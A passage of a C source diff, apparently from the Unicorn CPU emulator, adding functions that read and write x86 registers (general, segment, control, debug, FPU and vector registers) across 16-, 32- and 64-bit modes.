*(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + break; + case UC_X86_REG_IDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.idt.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.idt.base; + break; + case UC_X86_REG_GDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.gdt.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.gdt.base; + break; + case UC_X86_REG_LDTR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.ldt.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.ldt.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.ldt.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.ldt.flags; + break; + case UC_X86_REG_TR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.tr.limit; + ((uc_x86_mmr *)value)->base = (uint32_t)X86_CPU(uc, mycpu)->env.tr.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.tr.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.tr.flags; + break; + case UC_X86_REG_MSR: + x86_msr_read(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + *(uint32_t *)value = X86_CPU(uc, mycpu)->env.mxcsr; + break; + case UC_X86_REG_FS_BASE: + *(uint32_t *)value = (uint32_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + break; + } + break; + +#ifdef TARGET_X86_64 + case UC_MODE_64: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + *(int64_t *)value = X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0]; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + *(int64_t *)value = X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0]; + break; + case UC_X86_REG_EFLAGS: + *(int64_t *)value = cpu_compute_eflags(&X86_CPU(uc, mycpu)->env); + break; + case UC_X86_REG_RAX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EAX]; + break; + case UC_X86_REG_EAX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_RBX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBX]; + break; + case UC_X86_REG_EBX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_RCX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ECX]; + break; + case UC_X86_REG_ECX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_RDX: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDX]; + break; + case UC_X86_REG_EDX: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_RSP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESP]; + break; + case UC_X86_REG_ESP: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_SP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_SPL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_RBP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBP]; + break; + case UC_X86_REG_EBP: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_BP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_BPL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_RSI: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESI]; + break; + case UC_X86_REG_ESI: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_SI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_SIL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_RDI: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDI]; + break; + case UC_X86_REG_EDI: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_DI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_DIL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_RIP: + *(uint64_t *)value = X86_CPU(uc, mycpu)->env.eip; + break; + case UC_X86_REG_EIP: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_IP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_CS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_CS].selector; + break; + case UC_X86_REG_DS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + break; + case UC_X86_REG_SS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + break; + case UC_X86_REG_ES: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + break; + case UC_X86_REG_FS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + break; + case UC_X86_REG_GS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + break; + case UC_X86_REG_R8: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R8B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[8]); + break; + case UC_X86_REG_R9: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R9B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[9]); + break; + case UC_X86_REG_R10: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R10B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[10]); + break; + case UC_X86_REG_R11: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R11B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[11]); + break; + case UC_X86_REG_R12: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R12B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[12]); + break; + case UC_X86_REG_R13: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R13B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[13]); + break; + case UC_X86_REG_R14: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R14B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[14]); + break; + case UC_X86_REG_R15: + *(int64_t *)value = READ_QWORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15D: + *(int32_t *)value = READ_DWORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15W: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_R15B: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[15]); + break; + case UC_X86_REG_IDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.idt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.idt.base; + break; + case UC_X86_REG_GDTR: + ((uc_x86_mmr *)value)->limit = (uint16_t)X86_CPU(uc, mycpu)->env.gdt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.gdt.base; + break; + case UC_X86_REG_LDTR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.ldt.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.ldt.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.ldt.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.ldt.flags; + break; + case UC_X86_REG_TR: + ((uc_x86_mmr *)value)->limit = X86_CPU(uc, mycpu)->env.tr.limit; + ((uc_x86_mmr *)value)->base = X86_CPU(uc, mycpu)->env.tr.base; + ((uc_x86_mmr *)value)->selector = (uint16_t)X86_CPU(uc, mycpu)->env.tr.selector; + ((uc_x86_mmr *)value)->flags = X86_CPU(uc, mycpu)->env.tr.flags; + break; + case UC_X86_REG_MSR: + x86_msr_read(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + *(uint32_t *)value = X86_CPU(uc, mycpu)->env.mxcsr; + break; + case UC_X86_REG_XMM8: + case UC_X86_REG_XMM9: + case UC_X86_REG_XMM10: + case UC_X86_REG_XMM11: + case UC_X86_REG_XMM12: + case UC_X86_REG_XMM13: + case UC_X86_REG_XMM14: + case UC_X86_REG_XMM15: + { + float64 *dst = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + dst[0] = reg->_d[0]; + dst[1] = reg->_d[1]; + break; + } + case UC_X86_REG_FS_BASE: + *(uint64_t *)value = (uint64_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + break; + case UC_X86_REG_GS_BASE: + *(uint64_t *)value = (uint64_t)X86_CPU(uc, mycpu)->env.segs[R_GS].base; + break; + } + break; +#endif + } + } + + return 0; +} + +int x86_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + int ret; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + switch(regid) { + default: + break; + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + { + uint64_t mant = *(uint64_t*) value; + uint16_t upper = *(uint16_t*) ((char*)value + sizeof(uint64_t)); + X86_CPU(uc, mycpu)->env.fpregs[regid - UC_X86_REG_FP0].d = cpu_set_fp80(mant, upper); + } + continue; + case UC_X86_REG_FPSW: + { + uint16_t fpus = *(uint16_t*) value; + X86_CPU(uc, mycpu)->env.fpus = fpus & ~0x3800; + X86_CPU(uc, mycpu)->env.fpstt = (fpus >> 11) & 0x7; + } + continue; + case UC_X86_REG_FPCW: + cpu_set_fpuc(&X86_CPU(uc, mycpu)->env, *(uint16_t *)value); + continue; + case UC_X86_REG_FPTAG: + { + int i; + uint16_t fptag = *(uint16_t*) value; + for (i = 0; i < 8; i++) { + X86_CPU(uc, mycpu)->env.fptags[i] = ((fptag & 3) == 3); + fptag >>= 2; + } + + continue; + } + break; + case UC_X86_REG_XMM0: + case UC_X86_REG_XMM1: + case UC_X86_REG_XMM2: + case UC_X86_REG_XMM3: + case UC_X86_REG_XMM4: + case UC_X86_REG_XMM5: + case UC_X86_REG_XMM6: + case UC_X86_REG_XMM7: + { + float64 *src = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + reg->_d[0] = src[0]; + reg->_d[1] = src[1]; + continue; + } + case UC_X86_REG_ST0: + case UC_X86_REG_ST1: + case UC_X86_REG_ST2: + case UC_X86_REG_ST3: + case UC_X86_REG_ST4: + case UC_X86_REG_ST5: + case UC_X86_REG_ST6: + case UC_X86_REG_ST7: + { + // value must be big enough to keep 80 bits (10 bytes) + memcpy(&FPST(regid - UC_X86_REG_ST0), value, 10); + continue; + } + case UC_X86_REG_YMM0: + case UC_X86_REG_YMM1: + case UC_X86_REG_YMM2: + case UC_X86_REG_YMM3: + case UC_X86_REG_YMM4: + case UC_X86_REG_YMM5: + case UC_X86_REG_YMM6: + case UC_X86_REG_YMM7: + case UC_X86_REG_YMM8: + case UC_X86_REG_YMM9: + case UC_X86_REG_YMM10: + case UC_X86_REG_YMM11: + case UC_X86_REG_YMM12: + case UC_X86_REG_YMM13: + case UC_X86_REG_YMM14: + case UC_X86_REG_YMM15: + { + float64 *src = (float64*)value; + XMMReg *lo_reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_YMM0]; + XMMReg *hi_reg = &X86_CPU(uc, mycpu)->env.ymmh_regs[regid - UC_X86_REG_YMM0]; + lo_reg->_d[0] = src[0]; + lo_reg->_d[1] = src[1]; + hi_reg->_d[0] = src[2]; + hi_reg->_d[1] = src[3]; + continue; + } + } + + switch(uc->mode) { + default: + break; + + case UC_MODE_16: + switch(regid) { + default: break; + case UC_X86_REG_ES: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + continue; + case UC_X86_REG_SS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + continue; + case UC_X86_REG_DS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + continue; + case UC_X86_REG_FS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + continue; + case UC_X86_REG_GS: + load_seg_16_helper(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + continue; + } + // fall-thru + case UC_MODE_32: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0] = *(uint32_t *)value; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0] = *(uint32_t *)value; + break; + case UC_X86_REG_EFLAGS: + cpu_load_eflags(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value, -1); + X86_CPU(uc, mycpu)->env.eflags0 = *(uint32_t *)value; + break; + case UC_X86_REG_EAX: + X86_CPU(uc, mycpu)->env.regs[R_EAX] = *(uint32_t *)value; + break; + case UC_X86_REG_AX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint16_t *)value); + break; + case UC_X86_REG_AH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_AL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_EBX: + X86_CPU(uc, mycpu)->env.regs[R_EBX] = *(uint32_t *)value; + break; + case UC_X86_REG_BX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint16_t *)value); + break; + case UC_X86_REG_BH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_BL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_ECX: + X86_CPU(uc, mycpu)->env.regs[R_ECX] = *(uint32_t *)value; + break; + case UC_X86_REG_CX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint16_t *)value); + break; + case UC_X86_REG_CH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_CL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_EDX: + X86_CPU(uc, mycpu)->env.regs[R_EDX] = *(uint32_t *)value; + break; + case UC_X86_REG_DX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint16_t *)value); + break; + case UC_X86_REG_DH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_DL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_ESP: + X86_CPU(uc, mycpu)->env.regs[R_ESP] = *(uint32_t *)value; + break; + case UC_X86_REG_SP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint16_t *)value); + break; + case UC_X86_REG_EBP: + X86_CPU(uc, mycpu)->env.regs[R_EBP] = *(uint32_t *)value; + break; + case UC_X86_REG_BP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP], *(uint16_t *)value); + break; + case UC_X86_REG_ESI: + X86_CPU(uc, mycpu)->env.regs[R_ESI] = *(uint32_t *)value; + break; + case UC_X86_REG_SI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI], *(uint16_t *)value); + break; + case UC_X86_REG_EDI: + X86_CPU(uc, mycpu)->env.regs[R_EDI] = *(uint32_t *)value; + break; + case UC_X86_REG_DI: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI], *(uint16_t *)value); + break; + case UC_X86_REG_EIP: + X86_CPU(uc, mycpu)->env.eip = *(uint32_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_IP: + X86_CPU(uc, mycpu)->env.eip = *(uint16_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_X86_REG_CS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_CS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_CS, *(uint16_t *)value); + break; + case UC_X86_REG_DS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_DS, *(uint16_t *)value); + break; + case UC_X86_REG_SS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_SS, *(uint16_t *)value); + break; + case UC_X86_REG_ES: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_ES, *(uint16_t *)value); + break; + case UC_X86_REG_FS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_FS, *(uint16_t *)value); + break; + case UC_X86_REG_GS: + ret = uc_check_cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + if (ret) { + return ret; + } + cpu_x86_load_seg(&X86_CPU(uc, mycpu)->env, R_GS, *(uint16_t *)value); + break; + case UC_X86_REG_IDTR: + X86_CPU(uc, mycpu)->env.idt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.idt.base = (uint32_t)((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_GDTR: + X86_CPU(uc, mycpu)->env.gdt.limit = (uint16_t)((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.gdt.base = (uint32_t)((uc_x86_mmr *)value)->base; + break; + case UC_X86_REG_LDTR: + X86_CPU(uc, mycpu)->env.ldt.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.ldt.base = (uint32_t)((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.ldt.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.ldt.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_TR: + X86_CPU(uc, mycpu)->env.tr.limit = ((uc_x86_mmr *)value)->limit; + X86_CPU(uc, mycpu)->env.tr.base = (uint32_t)((uc_x86_mmr *)value)->base; + X86_CPU(uc, mycpu)->env.tr.selector = (uint16_t)((uc_x86_mmr *)value)->selector; + X86_CPU(uc, mycpu)->env.tr.flags = ((uc_x86_mmr *)value)->flags; + break; + case UC_X86_REG_MSR: + x86_msr_write(uc, (uc_x86_msr *)value); + break; + case UC_X86_REG_MXCSR: + cpu_set_mxcsr(&X86_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + /* + // Don't think base registers are a "thing" on x86 + case UC_X86_REG_FS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_FS].base = *(uint32_t *)value; + continue; + case UC_X86_REG_GS_BASE: + X86_CPU(uc, mycpu)->env.segs[R_GS].base = *(uint32_t *)value; + continue; + */ + } + break; + +#ifdef TARGET_X86_64 + case UC_MODE_64: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0] = *(uint64_t *)value; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0] = *(uint64_t *)value; + break; + case UC_X86_REG_EFLAGS: + cpu_load_eflags(&X86_CPU(uc, mycpu)->env, *(uint64_t *)value, -1); + X86_CPU(uc, mycpu)->env.eflags0 = *(uint64_t *)value; + break; + case UC_X86_REG_RAX: + X86_CPU(uc, mycpu)->env.regs[R_EAX] = *(uint64_t *)value; + break; + case UC_X86_REG_EAX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint32_t *)value); + break; + case UC_X86_REG_AX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint16_t *)value); + break; + case UC_X86_REG_AH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_AL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX], *(uint8_t *)value); + break; + case UC_X86_REG_RBX: + X86_CPU(uc, mycpu)->env.regs[R_EBX] = *(uint64_t *)value; + break; + case UC_X86_REG_EBX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint32_t *)value); + break; + case UC_X86_REG_BX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint16_t *)value); + break; + case UC_X86_REG_BH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_BL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX], *(uint8_t *)value); + break; + case UC_X86_REG_RCX: + X86_CPU(uc, mycpu)->env.regs[R_ECX] = *(uint64_t *)value; + break; + case UC_X86_REG_ECX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint32_t *)value); + break; + case UC_X86_REG_CX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint16_t *)value); + break; + case UC_X86_REG_CH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_CL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX], *(uint8_t *)value); + break; + case UC_X86_REG_RDX: + X86_CPU(uc, mycpu)->env.regs[R_EDX] = *(uint64_t *)value; + break; + case UC_X86_REG_EDX: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint32_t *)value); + break; + case UC_X86_REG_DX: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint16_t *)value); + break; + case UC_X86_REG_DH: + WRITE_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_DL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX], *(uint8_t *)value); + break; + case UC_X86_REG_RSP: + X86_CPU(uc, mycpu)->env.regs[R_ESP] = *(uint64_t *)value; + break; + case UC_X86_REG_ESP: + WRITE_DWORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint32_t *)value); + break; + case UC_X86_REG_SP: + WRITE_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint16_t *)value); + break; + case UC_X86_REG_SPL: + WRITE_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ESP], *(uint8_t *)value); + break; + case UC_X86_REG_RBP: + X86_CPU(uc, 